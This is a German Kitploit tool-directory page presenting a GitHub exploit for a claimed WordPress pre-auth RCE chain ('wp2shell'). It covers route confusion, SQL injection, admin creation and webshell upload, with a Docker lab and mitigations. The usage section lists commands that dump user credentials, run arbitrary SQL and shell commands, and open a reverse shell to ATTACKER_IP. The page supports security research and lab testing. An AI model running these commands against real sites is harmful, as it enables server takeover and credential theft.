Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-63030-CVE-2026-60137 — Pre-auth RCE-Exploit für WordPress (CVE-2026-63030 + CVE-2026-60137), das Routenverwirrung und SQL-Injection zu vollem Shell-Zugriff verknüpft. Enthält ein Docker-Lab für sicheres Testen. | Kitploit
Tools/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

Pre-auth RCE-Exploit für WordPress (CVE-2026-63030 + CVE-2026-60137), das Routenverwirrung und SQL-Injection zu vollem Shell-Zugriff verknüpft. Enthält ein Docker-Lab für sicheres Testen.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-63030 & CVE-2026-60137 — wp2shell

WordPress Core Pre-Auth RCE — Route Confusion + SQL Injection kombiniert zu Remote Code Execution

CVECVE-2026-63030 + CVE-2026-60137
Aliaswp2shell
SchwachstellentypREST API Route Confusion → SQL Injection → RCE
SchweregradKritisch — CVSS 10.0
BetroffenWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Behoben inWordPress 6.8.6, 6.9.5, 7.0.2
Authentifizierung erforderlichKeine (Pre-Auth)

Übersicht

wp2shell ist die Bezeichnung für die Exploit-Kette, die zwei Schwachstellen im WordPress Core kombiniert:

  • CVE-2026-63030 — Route Confusion: Der Batch-Endpoint (/wp-json/batch/v1) weist einen Indexversatz zwischen den Arrays $matches[] und $validation[] auf, wenn ein Sub-Request einen fehlerhaften Pfad hat. Dadurch läuft der nächste Sub-Request unter einem falschen Handler → Umgehung der REST-API-Schema-Validierung.
  • CVE-2026-60137 — SQL Injection: WP_Query::get_posts() saniert den Parameter author__not_in nicht, wenn er als String statt als Array übergeben wird → Raw-SQL-Injection.

Die beiden Bugs ergeben zusammen eine vollständige Pre-Auth-RCE-Kette – von 0 Credentials bis zur Shell auf dem Server, nur über HTTP-Anfragen.

Exploit-Kette

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

Lies die vollständige technische Analyse in REPORT.md


Lab-Setup

Das Lab verwendet Docker Compose mit 3 Containern:

ContainerImagePort
WordPress (verwundbar)wordpress:6.9.48080
MySQLmysql:8.0intern
phpMyAdminphpmyadmin:latest8081

Voraussetzungen

  • Docker + Docker Compose
  • Python 3.8+ (nur Stdlib, keine zusätzlichen Pakete erforderlich)
  • Bash (zum Ausführen von setup.sh)

Start

root@kitploit:~
cd wp2shell-lab
bash setup.sh

Das Skript führt automatisch aus:

  1. Zieht die Images und startet die Container
  2. Installiert WordPress 6.9.4
  3. Legt Beispieldaten an (Beiträge, Benutzer)
  4. Aktiviert das MySQL-General-Log + WP_DEBUG

Nach Abschluss wird "WP2Shell Lab — READY!" zusammen mit den Anmeldedaten angezeigt.

Aufräumen

root@kitploit:~
cd wp2shell-lab
docker compose down -v

Verwendung des Exploits

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

Das PoC-Skript wurde von Grund auf neu geschrieben, basierend auf Icex0/wp2shell-poc. Es verwendet ausschließlich die Python-3-Stdlib; es sind keine zusätzlichen Abhängigkeiten erforderlich.


Exploit-Bedingungen

BedingungAnforderung
WordPress-Version6.9.0–6.9.4 oder 7.0.0–7.0.1
REST-API-Batch-EndpointZugänglich (standardmäßig aktiviert)
AuthentifizierungNicht erforderlich
NetzwerkAngreifer kann WordPress erreichen

Gegenmaßnahmen

  1. WordPress upgraden auf >= 6.9.5 oder >= 7.0.2 – die einzig gründliche Lösung.
  2. Batch-Endpoint vorübergehend deaktivieren: add_filter('rest_batch_disabled', '__return_true'); in functions.php einfügen.
  3. WAF-Regel: Anfragen an /wp-json/batch/v1 blockieren, die SQL-Schlüsselwörter enthalten.

Haftungsausschluss

Dieses Repo wurde für Forschung, Lernen und CTF in einer kontrollierten Laborumgebung erstellt. Nicht für Angriffe auf echte Systeme verwenden. Jede unbefugte Ausnutzung ist ein Verstoß gegen das Gesetz.


Referenzen

  • Icex0/wp2shell-poc — ursprüngliches Referenz-PoC
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
Tool herunterladen